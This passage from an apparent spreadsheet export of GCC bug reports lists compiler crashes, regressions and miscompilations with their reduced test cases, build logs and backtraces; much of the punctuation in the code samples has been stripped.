    <t>Created attachment 33374
Reduced test case
A gcc build for SH produces an invalid opcode when building libgcc.  It produces stc srrN when it should produce ldc srrN.
/data/fedora/cross-gcc/gcc-4.9.1-20140717/sh-linux-gnu/./gcc/xgcc -B/data/fedora/cross-gcc/gcc-4.9.1-20140717/sh-linux-gnu/./gcc/ -B/usr/sh-linux-gnu/bin/ -O2 -mb -fpic -w -Wno-sync-nand -fbuilding-libgcc -o /tmp/linux-atomic.o -c /tmp/linux-atomic.i
/tmp/ccHwXin4.s: Assembler messages:
/tmp/ccHwXin4.s:19: Error: invalid operands for opcode
/tmp/ccHwXin4.s:38: Error: invalid operands for opcode
/tmp/ccHwXin4.s:56: Error: invalid operands for opcode
Interestingly if -Wno-sync-nand is removed I see this:
/tmp/linux-atomic.i:7:2: note: â€˜__sync_fetch_and_nandâ€™ changed semantics in GCC 4.4
  return __sync_fetch_and_nand (x y z)
in addition.  I've attached /tmp/linux-atomic.i as a reduced test case.</t>
  </si>
  <si>
    <t>GCC-57144</t>
  </si>
  <si>
    <t>[4.9 regression] mpfr miscompiled after r198413</t>
  </si>
  <si>
    <t>r198413 is causing miscompilation of mpfr-2.4.2 on ia64 seen by a lot of failures in its testsuite some are looping infinitely.  This makes it impossible to bootstrap with an in-tree mpfr because the fortran compiler hangs while calling mpfr_log10 from gfc_arith_init_1.
The patch in  does not help.</t>
  </si>
  <si>
    <t>GCC-81938</t>
  </si>
  <si>
    <t>valgrind error message and heap-buffer-overflow on address sanitized libgfortran.so</t>
  </si>
  <si>
    <t>! test case fmt_cache_1.f
! compiled with -g
! valgrind error message and heap-buffer-overflow on address sanitized libgfortran.so
      program astap
      implicit none
      character(34) :: teststring
      real(4) :: arlxca = 0.0
      open(10)
      write(1040) arlxca
      write(1040) arlxca
40    format(t4arlxca = 1pg13.6t27arlxcc = g13.6t53
     .            atmpca = g13.6t79atmpcc = g13.6t105
     .            backup = g13.6/
     .         t4csgfac = g13.6t27csgmax = g13.6t53
     .            csgmin = g13.6t79drlxca = g13.6t105
     .            drlxcc = g13.6/
     .         t4dtimeh = g13.6t27dtimei = g13.6t53
     .            dtimel = g13.6t79dtimeu = g13.6t105
     .            dtmpca = g13.6/
     .         t4dtmpcc = g13.6t27ebalna = g13.6t53
     .            ebalnc = g13.6t79ebalsa = g13.6t105
     .            ebalsc = g13.6)
      rewind 10
      teststring = 
      read(10'(a)') teststring
      if (teststring.ne.   arlxca =   0.00000     arlxcc =)call abort
      teststring = 
      read(10'(a)') teststring
      if (teststring.ne.   arlxca =   0.00000     arlxcc =)call abort
      close(10 status='delete')
      end program astap
!==5357== Memcheck a memory error detector
!==5357== Copyright (C) 2002-2017 and GNU GPL'd by Julian Seward et al.
!==5357== Using Valgrind-3.13.0 and LibVEX rerun with -h for copyright info
!==5357== Command: ./a.out
!==5357==
!==5357== Invalid read of size 4
!==5357==    at 0x5020044: _gfortrani_free_format_data (format.c:269)
!==5357==    by 0x50200D5: _gfortrani_free_format_hash_table (format.c:68)
!==5357==    by 0x5031789: close_unit_1 (unit.c:787)
!==5357==    by 0x400CBD: MAIN__ (p.f:31)
!==5357==    by 0x400CF4: main (p.f:32)
!==5357==  Address 0x5dbdf30 is 0 bytes after a block of size 4176 alloc'd
!==5357==    at 0x4C2EB6B: malloc (vg_replace_malloc.c:299)
!==5357==    by 0x4E55404: _gfortrani_xmalloc (memory.c:42)
!==5357==    by 0x50203D2: _gfortrani_parse_format (format.c:1318)
!==5357==    by 0x502F727: data_transfer_init (transfer.c:2791)
!==5357==    by 0x400A0B: MAIN__ (p.f:10)
!==5357==    by 0x400CF4: main (p.f:32)
!==5357==
!==5357==
!==5357== HEAP SUMMARY:
!==5357==     in use at exit: 0 bytes in 0 blocks
!==5357==   total heap usage: 31 allocs 31 frees 34795 bytes allocated
!==5357==
!==5357== All heap blocks were freed -- no leaks are possible
!==5357==
!==5357== For counts of detected and suppressed errors rerun with: -v
!==5357== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)</t>
  </si>
  <si>
    <t>GCC-1780</t>
  </si>
  <si>
    <t>max function does not compile if  is included</t>
  </si>
  <si>
    <t xml:space="preserve">The following source file tm.C does no longer compile with the
current g++ compiler snapshot. It did compile with previous snapshots
of the c++-library. I believe the source code should
compile since the libstdc++ max functions should only be available if
the  header is explicitly included.
Release:
2.97 20010125 (experimental)
Environment:
System: Linux kiste 2.4.0 #25 Tue Jan 16 01:22:25 CET 2001 i686 unknown
Architecture: i686
glibc 2.1.3
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-nls --enable-shared
How-To-Repeat:
source file tm.C
#include 
template 
 T max(T a T b)
{
  if (a &gt; b)
    return a
  else
    return b
}
using namespace std
int main()
{
  int i1 = 100 i2 = 200
  cout &lt;&lt; max(i1 i2) ==  &lt;&lt; max(i1 i2) &lt;&lt; endl
}
Compiling the source file tm.C
g++ -v -o tm tm.C -W -Wall -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc/configure --disable-nls --enable-shared --enable-threads=posix
gcc version 2.97 20010125 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=2 -D__GXX_ABI_VERSION=100 -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -W -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tm.C tm.ii
GNU CPP version 2.97 20010125 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/i686-pc-linux-gnu/include/g++-v3
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cc1plus -fpreprocessed tm.ii -quiet -dumpbase tm.C -W -Wall -version -o tm.s
GNU CPP version 2.97 20010125 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 2.97 20010125 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 2.97 20010125 (experimental).
tm.C: In function `int main()':
tm.C:16: call of overloaded `max(int&amp; int&amp;)' is ambiguous
tm.C:5: candidates are: T max(T T) [with T = int]
/usr/local/include/g++-v3/bits/stl_algobase.h:106:                 const _Tp&amp; 
   std::max(const _Tp&amp; const _Tp&amp;) [with _Tp = int]
Bzip2 compressed preprocessed source file tm.ii.bz2
See attachments for tm.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-34975</t>
  </si>
  <si>
    <t>[4.3 Regression] Bogus error with USEing modules</t>
  </si>
  <si>
    <t>The following was found when compiling the Quantum Espresso package
http://www.quantum-espresso.org/.
I failed to reduce it further currently I have:
  236 cell_base.f90
   56 constants.f90
  260 control_flags.f90
  119 electrons_base.f90
  164 ions_base.f90
    5 kind.f90
   15 modules.f90
   47 parameters.f90
   91 recvec.f90
   19 test.f90
 1012 total
The error message shown is:
test.f90:13.14:
  complex c0(n) betae df&amp;
             1
Error: Symbol 'n' at (1) has no IMPLICIT type
test.f90:1.24:
subroutine dforceb(c0 i betae ipol bec0 ctabin gqq gqqm qmat dq2 df)
                       1
Error: Symbol 'i' at (1) has no IMPLICIT type
However there is:
  use electrons_base only: nx =&gt; nbspx n =&gt; nbsp nspin f
[...]
  integer ipol i ctabin</t>
  </si>
  <si>
    <t>GCC-2238</t>
  </si>
  <si>
    <t>Use of a class member constant as a size for a member array creation is not handled and causes an Internal compiler error in weird places.</t>
  </si>
  <si>
    <t>Define a constant as a class member.
Use it in defining a fixed length array class member.
Compiler then falls over in wierd places.
Declaring internal compiler error.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
SunOS 5.5.1 Generic_103640-34 sun4u sparc sun4u
How-To-Repeat:
typedef unsigned char octet
class Cell {	
	typedef octet size_type
	typedef octet value_type
	static const size_type SIZE
	value_type data[ SIZE ]
public:
	Cell( void )
	void getFirst( void ) const {
		return data[0] // Death - Type I - Internal Compiler Error
	}
}
const Cell::size_type Cell::SIZE = 53
Cell::Cell( void )
{ // Death - Type II - Internal Compiler Error
	data[1] = 5
}</t>
  </si>
  <si>
    <t>GCC-38017</t>
  </si>
  <si>
    <t>[4.4 Regression] 30_threads/thread/cons/X.cc</t>
  </si>
  <si>
    <t>On Linux/Intel64 revision 141596 gave:
+FAIL: 30_threads/call_once/call_once1.cc (test for excess errors)
+FAIL: 30_threads/call_once/call_once1.cc (test for excess errors)
+FAIL: 30_threads/thread/cons/2.cc (test for excess errors)
+FAIL: 30_threads/thread/cons/2.cc (test for excess errors)
+FAIL:  (test for excess errors)
+FAIL: 30_threads/thread/cons/3.cc (test for excess errors)
+FAIL: 30_threads/thread/cons/4.cc (test for excess errors)
+FAIL: 30_threads/thread/cons/4.cc (test for excess errors)
In file included from /export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/functional:75^M
                 from /export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/mutex:49^M
                 from /export/gnu/import/svn/gcc-test/src-trunk/libstdc++-v3/testsuite/30_threads/call_once/call_once1.cc:35:^M
/export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/tr1_impl/functional: In instantiation of 'std::_Result_of_impl ()(int std::tuple)&gt;':^M
/export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/tr1_impl/functional:154:   instantiated from 'std::result_of ()(int std::tuple)&gt;'^M
/export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/mutex:714:   instantiated from 'void std::__once_call_impl() [with _Callable = std::_Bind]'^M
/export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/mutex:730:   instantiated from 'void std::call_once(std::once_flag&amp; _Callable _Args&amp;&amp; ...) [with _Callable = void (*)(int) _Args = int]'^M
/export/gnu/import/svn/gcc-test/src-trunk/libstdc++-v3/testsuite/30_threads/call_once/call_once1.cc:53:   instantiated from here^M
/export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/tr1_impl/functional:299: error: no match for call to '(std::_Mu) (int std::tuple)'^M
/export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/tr1_impl/functional:1241: note: candidates are: _CVArg&amp; std::_Mu::operator()(_CVArg&amp; const _Tuple&amp;) const volatile [with _CVArg = int _Tuple = std::tuple _Arg = int]^M
In file included from /export/gnu/import/svn/gcc-test/src-trunk/libstdc++-v3/testsuite/30_threads/call_once/call_once1.cc:35:^M
/export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/mutex: In function 'void std::__once_call_impl() [with _Callable = std::_Bind]':^M
/export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/mutex:730:   instantiated from 'void std::call_once(std::once_flag&amp; _Callable _Args&amp;&amp; ...) [with _Callable = void (*)(int) _Args = int]'^M
/export/gnu/import/svn/gcc-test/src-trunk/libstdc++-v3/testsuite/30_threads/call_once/call_once1.cc:53:   instantiated from here^M
/export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/mutex:714: error: no match for call to '(std::_Bind) ()'^M
Revision 141591 is OK.</t>
  </si>
  <si>
    <t>GCC-3369</t>
  </si>
  <si>
    <t>powerpc-unknown-eabi fails to compile on gcc 3.0 CVS branch</t>
  </si>
  <si>
    <t>../gcc/configure --target=powerpc-unknown-eabi --with-gnu-as --with-gnu-ld --with-newlib --verbose --prefix=/usr1/tmp-tools --enable-languages=cc++ &amp;&amp; make
fails with this error:
/tmp/ccwWZTZk.s: Assembler messages:
/tmp/ccwWZTZk.s:234: Error: Relocation cannot be done when using -mrelocatable
make[7]: *** [new_op.lo] Error 1
make[7]: Leaving directory `/usr3/ftp_archive/gnu/gcc/ss/b3/b-powerpc-unknown-eabi/powerpc-unknown-eabi/nof/libstdc++-v3/libsupc++'
Release:
gcc 3.0 CVS branch
Environment:
GNU/Linux RedHat 6.2 targetting powerpc-unknown-eabi
How-To-Repeat:
configure and build per description.
I used binutils 2.10 and newlib 1.9.0</t>
  </si>
  <si>
    <t>GCC-44135</t>
  </si>
  <si>
    <t>Negative array bounds lead to spurious warning</t>
  </si>
  <si>
    <t>The declaration of arrays with negative bounds leads to a warning message probably caused by an integer overflow. The program below leads to the message
gprogram.f90:6.19:
   call fill_array(my_arr)
                   1
Warning: Actual argument contains too few elements for dummy argument 'arr' (3/4294967295) at (1)
	program     gprogram
	   implicit none
	   double precision dimension(-2:0) :: my_arr
	   call fill_array(my_arr)
	   print* my_arr(-2)
	   print* my_arr(-1)
	   print* my_arr( 0)
	contains
	   subroutine     fill_array(arr)
	      implicit none
	      double precision dimension(-2:0) intent(out) :: arr
	      arr(-2) = 1.0d0
	      arr(-1) = 3.1d0
	      arr( 0) = 9.2d0
	   end subroutine fill_array
	end program gprogram</t>
  </si>
  <si>
    <t>thomasr</t>
  </si>
  <si>
    <t>GCC-42268</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] derived type segfault with pack</t>
  </si>
  <si>
    <t>This is a clone of bug 41478 because this part is a regression
(incidentally introduced by me).
The problem was analyzed by Janus: not checking for the presence
of vector when trying to access vector-&gt;data.</t>
  </si>
  <si>
    <t>GCC-82617</t>
  </si>
  <si>
    <t>Internal compiler error in expand_expr_real_1 when compiling the attached file</t>
  </si>
  <si>
    <t>Created attachment 42400
Source file triggering the crash
When compiling the attached file gfortran crashes with the error Internal compiler error in expand_expr_real_1. Confirmed in versions 7.2.0 and 4.8.5. File compiles successfully with no warnings issued in intel fortran compiler 16.0.3 and pgi fortran compiler 17.4.0.</t>
  </si>
  <si>
    <t>uberprugelknabe</t>
  </si>
  <si>
    <t>GCC-31203</t>
  </si>
  <si>
    <t>[4.1/4.2 only] Character length should never be negative</t>
  </si>
  <si>
    <t>With a recent gfortran the following compiles but generates the wrong results:
call s(-3)
call s(2**18)
contains
subroutine s(i)
character(LEN=I) a
IF(LEN(a).NE.MAX(0I)) CALL ABORT()
end subroutine
end</t>
  </si>
  <si>
    <t>GCC-19393</t>
  </si>
  <si>
    <t>[3.4 Regression] Assembler error: branch out of range</t>
  </si>
  <si>
    <t>Building today's (2005-01-12) gcc-CVS/trunk for arm-rtems4.7 fails in libiberty:
/users/rtems/src/rpms/BUILD/rtems-4.7-arm-rtems4.7-gcc-newlib-gcc3.4.4newlib1.13.0/build/gcc/xgcc
-B/users/rtems/src/rpms/BUILD/rtems-4.7-arm-rtems4.7-gcc-newlib-gcc3.4.4newlib1.13.0/build/gcc/
-nostdinc
-B/users/rtems/src/rpms/BUILD/rtems-4.7-arm-rtems4.7-gcc-newlib-gcc3.4.4newlib1.13.0/build/arm-rtems4.7/newlib/
-isystem
/users/rtems/src/rpms/BUILD/rtems-4.7-arm-rtems4.7-gcc-newlib-gcc3.4.4newlib1.13.0/build/arm-rtems4.7/newlib/targ-include
-isystem
/users/rtems/src/rpms/BUILD/rtems-4.7-arm-rtems4.7-gcc-newlib-gcc3.4.4newlib1.13.0/gcc-3.4.4/newlib/libc/include
-B/opt/rtems-4.7/arm-rtems4.7/bin/ -B/opt/rtems-4.7/arm-rtems4.7/lib/ -isystem
/opt/rtems-4.7/arm-rtems4.7/include -isystem
/opt/rtems-4.7/arm-rtems4.7/sys-include -c -DHAVE_CONFIG_H -O2 -g -O2  -mthumb
-I. -I../../../../gcc-3.4.4/libiberty/../include  -W -Wall -Wtraditional
-pedantic ../../../../gcc-3.4.4/libiberty/regex.c -o regex.o
In file included from ../../../../gcc-3.4.4/libiberty/../include/xregex.h:26
                 from ../../../../gcc-3.4.4/libiberty/regex.c:195:
../../../../gcc-3.4.4/libiberty/../include/xregex2.h:548: warning: ISO C90 does
not support `static' or type qualifiers in parameter array declarators
../../../../gcc-3.4.4/libiberty/regex.c: In function `xregcomp':
../../../../gcc-3.4.4/libiberty/regex.c:8043: warning: signed and unsigned type
in conditional expression
../../../../gcc-3.4.4/libiberty/regex.c: At top level:
../../../../gcc-3.4.4/libiberty/regex.c:8178: warning: unused parameter 'preg'
/tmp/ccPZWeWX.s: Assembler messages:
/tmp/ccPZWeWX.s:3602: Error: branch out of range
make[3]: *** [regex.o] Error 1
make[3]: Leaving directory
`/users/rtems/src/rpms/BUILD/rtems-4.7-arm-rtems4.7-gcc-newlib-gcc3.4.4newlib1.13.0/build/arm-rtems4.7/thumb/libiberty'
make[2]: *** [multi-do] Error 1</t>
  </si>
  <si>
    <t>GCC-7812</t>
  </si>
  <si>
    <t>insanely long compilation times on simple C files</t>
  </si>
  <si>
    <t xml:space="preserve">GCC is unable to compile this simple file in reasonable time. In fact I
stopped it after one hour. Compiler does not use unreasonable amounts of 
memory only around 40MB.
Release:
3.3 20020901 (experimental)
Environment:
System: CYGWIN_NT-5.1 AMBER2 1.3.12(0.54/3/2) 2002-07-06 02:16 i686 unknown
host: i686-pc-cygwin
build: i686-pc-cygwin
target: i686-pc-cygwin
configured with: ../srcdir/configure --enable-languages=cc++ --enable-threads=posix --enable-version-specific-runtime-libs --enable-shared --enable-dwarf2 --with-cpu=athlon-tbird --with-arch=athlon-tbird --srcdir=/C/WilX/gcc33/srcdir
How-To-Repeat:
See attachments for gdfontl.i.bz2
</t>
  </si>
  <si>
    <t>GCC-54250</t>
  </si>
  <si>
    <t>Segmentation fault when decltype of a struct field is used in nested lambdas</t>
  </si>
  <si>
    <t>// this code causes segmentation fault during compilation
// compiled with: g++ -std=c++0x
// compiler version: 4.6.2
// note: uncommenting 'this' fixes the problem
struct T
{
    int a
    int foo()
    {
        return [&amp;]()-&gt;int {
            return [&amp;](decltype(/*this-&gt;*/a) _)-&gt;int {
                return 1
            }(a)
        }()
    }
}
int main()
{
    return 0
}</t>
  </si>
  <si>
    <t>linesprower</t>
  </si>
  <si>
    <t>GCC-69253</t>
  </si>
  <si>
    <t>[6 Regression] ICE in cxx_incomplete_type_diagnostic initializing a flexible array member with empty string</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current g++ trunk at -O0  on x86_64-linux-gnu in both 32-bit and 64-bit modes.
Please note that g++ with -O1 and above compiles the code snippet. Should g++ allow the initialization of flexible array members?
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/home/absozero/trunk/root-gcc/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc/configure --prefix=/home/absozero/trunk/root-gcc --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20160112 (experimental) [trunk revision 232269] (GCC)
$ g++-trunk  -O0 -c abc.cc
abc.cc: In function 'void fn1()':
abc.cc:5:33: internal compiler error: in cxx_incomplete_type_diagnostic at cp/typeck2.c:567
 void fn1() { (struct str){1 } }
                                 ^
0x6c53cf cxx_incomplete_type_diagnostic(tree_node const* tree_node const* diagnostic_t)
	../../gcc/gcc/cp/typeck2.c:567
0xf863fa size_in_bytes(tree_node const*)
	../../gcc/gcc/tree.c:2925
0xa1369c int_expr_size
	../../gcc/gcc/expr.c:11639
0xa2709a store_expr_with_bounds(tree_node* rtx_def* int bool bool tree_node*)
	../../gcc/gcc/expr.c:5360
0xa28821 expand_assignment(tree_node* tree_node* bool)
	../../gcc/gcc/expr.c:5021
0x91a9be expand_gimple_stmt_1
	../../gcc/gcc/cfgexpand.c:3606
0x91a9be expand_gimple_stmt
	../../gcc/gcc/cfgexpand.c:3702
0x91e0a4 expand_gimple_basic_block
	../../gcc/gcc/cfgexpand.c:5708
0x923076 execute
	../../gcc/gcc/cfgexpand.c:6323
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
------------------
$ cat abc.cc
struct str {
  int a
  char s[]
}
void fn1() { (struct str){1 } }</t>
  </si>
  <si>
    <t>GCC-18655</t>
  </si>
  <si>
    <t>Incorrect data in  .debug_frame  section for PowerPC</t>
  </si>
  <si>
    <t>The output generated in the .debug_frame section is incorrect as follows:
1. The return_address_register in the CIE is given as 65.  In the ABI 
supplement for the PowerPC this is the ID of the Floating Point Status and 
Control Register.  This should probably have been 108 the ID of the Link 
Register.
2. In the body of the FDE the return address is put into in register 108.  
Since the CIE specifies that the return is in register 65 this value is lost 
when traversing the stack
These two register IDs should be the same. (They were both 65 in the 3.2 
version of the compiler).  The simple test case provided generates one CIE and 
three FDE entries.  The FDEs for main and sub2 are both inconsistent with the 
CIE.
Results from gcc -v:
Reading specs from /usr/lib/gcc/ppc64-redhat-linux/3.4.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --
infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-
checking --with-system-zlib --enable-__cxa_atexit --disable-libunwind-
exceptions --enable-languages=cc++objcjavaf77 --enable-java-awt=gtk --
host=ppc64-redhat-linux --build=ppc64-redhat-linux --target=ppc64-redhat-linux -
-with-cpu=default32
Thread model: posix
gcc version 3.4.2 20041017 (Red Hat 3.4.2-6.fc3)
command line:
g++ -v x.cpp
Original source file (x.cpp):
//#include 
int sub1(int x)
{
  return x + 1
}
int sub2(int x)
{
  for (int i = 0 i &lt; 10 i++)
    x = sub1(x + i)
  return 0
}
int main(int argc char** argv)
{
  return sub2(argc)
}
//------------------------------------------------------------------------------
Preprocessed file x.ii:
# 1 x.cpp
# 1 /home/pett/dev/test//
# 1 
# 1 
# 1 x.cpp
int sub1(int x)
{
  return x + 1
}
int sub2(int x)
{
  for (int i = 0 i &lt; 10 i++)
    x = sub1(x + i)
  return 0
}
int main(int argc char** argv)
{
  return sub2(argc)
}</t>
  </si>
  <si>
    <t>pett</t>
  </si>
  <si>
    <t>GCC-19350</t>
  </si>
  <si>
    <t>Compilation with -O1 -ftree-vectorize gives unrecognizable insn on x86.</t>
  </si>
  <si>
    <t>Following test code
-- test.c -------------------------------
typedef struct { int x int y[16] } ta
typedef struct { int y[16] } tb
void f (tb *b)
{
        int i j ta *a
        for (i=0 j=a-&gt;x iy[i] = a-&gt;y[i]
}
-----------------------------------------
when compiled with
-----------------------------------------
gcc -O1 -ftree-vectorize -S test.c -o test.s
-----------------------------------------
using
-----------------------------------------
$ gcc -v
Using built-in specs.
Configured with: ../../../gcc-CVS-20050107/gcc-CVS-20050107/configure
--host=i786-pc-linux-gnu --prefix=/usr/local/opt/gcc-4.0
--exec-prefix=/usr/local/opt/gcc-4.0 --sysconfdir=/etc
--libdir=/usr/local/opt/gcc-4.0/lib --libexecdir=/usr/local/opt/gcc-4.0/libexec
--sharedstatedir=/var --localstatedir=/var --program-suffix=-4.0
--with-x-includes=/usr/X11R6/include --with-x-libraries=/usr/X11R6/lib
--enable-shared --enable-static --with-gnu-as --with-gnu-ld --with-stabs
--enable-threads=posix --enable-version-specific-runtime-libs --disable-coverage
--enable-gather-detailed-mem-stats --disable-libgcj --disable-checking
--enable-multilib --with-x --enable-cmath --enable-libstdcxx-debug
--enable-fast-character --enable-hash-synchronization --with-system-zlib
--with-libbanshee --with-demangler-in-ld --with-arch=athlon-xp --enable-libada
--enable-languages=cc++f95objcada
Thread model: posix
gcc version 4.0.0 20050107 (experimental)
$
-----------------------------------------
gives
-----------------------------------------
test.c: In function 'f':
test.c:7: error: unrecognizable insn:
(insn 69 68 70 6 (set (reg:V4SI 94)
        (vec_concat:V4SF (mem:V2SF (reg:SI 64 [ ivtmp.66 ]) [0 S8 A8])
            (vec_select:V2SF (reg:V4SI 94)
                (parallel [
                        (const_int 2 [0x2])
                        (const_int 3 [0x3])
                    ])))) -1 (insn_list:REG_DEP_TRUE 68 (nil))
    (nil))
test.c:7: internal compiler error: in extract_insn at recog.c:2020
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
-----------------------------------------
Works on x86_64 arch. (compiled by the native gcc compiled from the same sources
as the one mentioned above).</t>
  </si>
  <si>
    <t>GCC-71883</t>
  </si>
  <si>
    <t>[5/6/7 Regression] ICE in identical_array_ref at fortran/dependency.c:104</t>
  </si>
  <si>
    <t>ICE on rank mismatch or typo with experimental (--enable-checking=yes)
versions 7 6 and maybe older. No ICE for release versions 4.9 5 6.
$ cat z1.f90
program p
   character(3) allocatable :: z(::)
   z(1:21:2) = 'abc'
   z(21) = z(12)
   z(21) = z(12)
end
$ gfortran-6 z1.f90            # release
z1.f90:4:13:
    z(21) = z(12)
             1
Error: Rank mismatch in array reference at (1) (1/2)
z1.f90:5:4:
    z(21) = z(12)
    1
Error: Rank mismatch in array reference at (1) (1/2)
$ gfortran-7-20160710 z1.f90   # experimental
z1.f90:4:13:
    z(21) = z(12)
             1
Error: Rank mismatch in array reference at (1) (1/2)
z1.f90:5:4:
    z(21) = z(12)
    1
Error: Rank mismatch in array reference at (1) (1/2)
f951: internal compiler error: in identical_array_ref at fortran/dependency.c:104
0x70fdee identical_array_ref
        ../../gcc/fortran/dependency.c:104
0x70fdee are_identical_variables
        ../../gcc/fortran/dependency.c:164
0x70fdee gfc_dep_compare_expr(gfc_expr* gfc_expr*)
        ../../gcc/fortran/dependency.c:462
0x7ac7a6 realloc_string_callback
        ../../gcc/fortran/frontend-passes.c:182
0x7af779 gfc_code_walker(gfc_code** int (*)(gfc_code** int* void*) int (*)(gfc_expr** int* void*) void*)
        ../../gcc/fortran/frontend-passes.c:3376
0x7b08c2 realloc_strings
        ../../gcc/fortran/frontend-passes.c:1015
0x6eb38a gfc_resolve(gfc_namespace*)
        ../../gcc/fortran/resolve.c:15707
0x6d668a resolve_all_program_units
        ../../gcc/fortran/parse.c:5853
0x6d668a gfc_parse_file()
        ../../gcc/fortran/parse.c:6105
0x718d12 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:198</t>
  </si>
  <si>
    <t>GCC-40908</t>
  </si>
  <si>
    <t>FAIL: abi_check</t>
  </si>
  <si>
    <t>1 incompatible symbols 
0
_ZNSt5mutexC1Evstd::mutex::mutex()
version status: incompatible
GLIBCXX_3.4
type: functionstatus: added
                === libstdc++-v3 check-abi Summary ===
# of added symbols:              119
# of missing symbols:            0
# of incompatible symbols:       1
using: baseline_symbols.txt
FAIL: abi_check
First seen in revision 149758.  149733 was ok.</t>
  </si>
  <si>
    <t>GCC-6699</t>
  </si>
  <si>
    <t>recompile xerces with gcj</t>
  </si>
  <si>
    <t>uncompresse tmp.tgz
enter ant commande
and obtain:
     [exec] gcj -fjni -c org/apache/xerces/validators/schema/TraverseSchema$SchemaInfo.class -o org/apache/xerces/validators/schema/TraverseSchema$SchemaInfo.o
     [exec] org/apache/xerces/validators/schema/TraverseSchema.class: In method `_GLOBAL__I__ZN3org6apache6xerces10validators6schema14TraverseSchema18__U3c_clinit__U3e_Ev()':
     [exec] org/apache/xerces/validators/schema/TraverseSchema.class:0: Internal error: Erreur de segmentation
     [exec] Please submit a full bug report
     [exec] with preprocessed source if appropriate.
     [exec] See  for instructions.
     [exec] make: *** [org/apache/xerces/validators/schema/TraverseSchema$SchemaInfo.o] Erreur 1
     [exec] Result: 2
Release:
unknown
Environment:
gcc version 3.0.4
linux mandrake 8.1
Pentium 2 266MHz + 320Mo SDRAM
xerces.jar where is in jdom-b8 lib directory</t>
  </si>
  <si>
    <t>bertolod</t>
  </si>
  <si>
    <t>GCC-50061</t>
  </si>
  <si>
    <t>[4.7 regression] emit_library_call_value_1 change broke SF-&gt;TI conversion on MIPS</t>
  </si>
  <si>
    <t>Julian
your patch
2011-08-01  Julian Brown  
	* calls.c (emit_library_call_value_1): Support padding for libcall
	arguments and return values.
	* config/arm/arm.c (arm_pad_arg_upward): Pad half-float values
	downwards in big-endian mode.
introduced several testsuite regressions on IRIX 6.5.  Initially I suspected
that my fp-bit move to toplevel gcc had been the culprit but a reghunt identified
your patch.  I've used the following testcase derived from
gcc.dg/torture/fp-int-convert-timode.c.  It aborts with your patch:
extern void abort (void)
extern void exit (int)
typedef int TItype __attribute__ ((mode (TI)))
int
main (void)
{
  static volatile TItype ivin ivout
  static volatile float  fv1 fv2
  ivin = (TItype)1
  fv1 = (TItype)1
  fv2 = ivin
  ivout = fv2
  if (ivin != ((TItype)1)
      || ivout != ivin
      || ivout != (TItype)1
      || fv1 != (TItype)1
      || fv2 != (TItype)1
      || fv1 != fv2)
    abort ()
  exit (0)
}
Comparing gcc -O3 -save-temps output before and after the patch I find that
it introduced a wrong shift of one __fixsfti arg:
        ld      $25%call16(__fixsfti)($28)
+       dmfc1   $2$f12
+       nop
+       dsll    $2$232
+       dmtc1   $2$f12
        jalr    $25
Please fix.
  Rainer</t>
  </si>
  <si>
    <t>GCC-32931</t>
  </si>
  <si>
    <t>FORALL and WHERE give an ICE with -m64</t>
  </si>
  <si>
    <t>I think the following is different enough from PR32770 to justify a new PR. As reported
gfortran.dg/forall_4.f90 and gfortran.dg/where_operator_assign_2.f90 give an ICE
when compiled on darwin8 with both -fdefault-integer-8 and -m64 (see PR32770#20) fo a backtrace. 
The following reduced codes yield the same ICE:
  integer parameter :: n = 4
  integer :: i a(n)
  logical :: s(n)
  s = .True.
  a = 0
  forall (i=1:n .not. s(i)) a(i) = i
